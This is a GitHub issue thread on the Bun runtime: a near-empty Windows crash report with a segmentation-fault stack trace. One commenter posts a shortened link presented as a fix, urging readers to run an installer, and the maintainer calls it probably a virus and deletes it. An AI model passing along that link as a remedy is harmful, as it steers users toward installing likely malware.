### ISSUE TITLE
j

### ISSUE THREAD

**Issue by zumbiepig** [oven-sh/bun#13699]
### How can we reproduce the crash?

hi

### Relevant log output

```shell
hi```
```

### Stack Trace (bun.report)

Bun v1.1.26 ([`0a37423`](<https://github.com/oven-sh/bun/tree/0a37423bafab6aebe803e5f1594cffa9796f2ae6>)) on windows x86_64 [RunCommand]

Segmentation fault at address 0x00000000

**Comment by Klevente12** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by Jarred-Sumner** [comment]
> is this a virus ![image](https://private-user-images.githubusercontent.com/121742281/363798112-1e0fbe3f-5f70-4d5c-b24d-2a04763959f3.png

probably. i deleted that user's comment
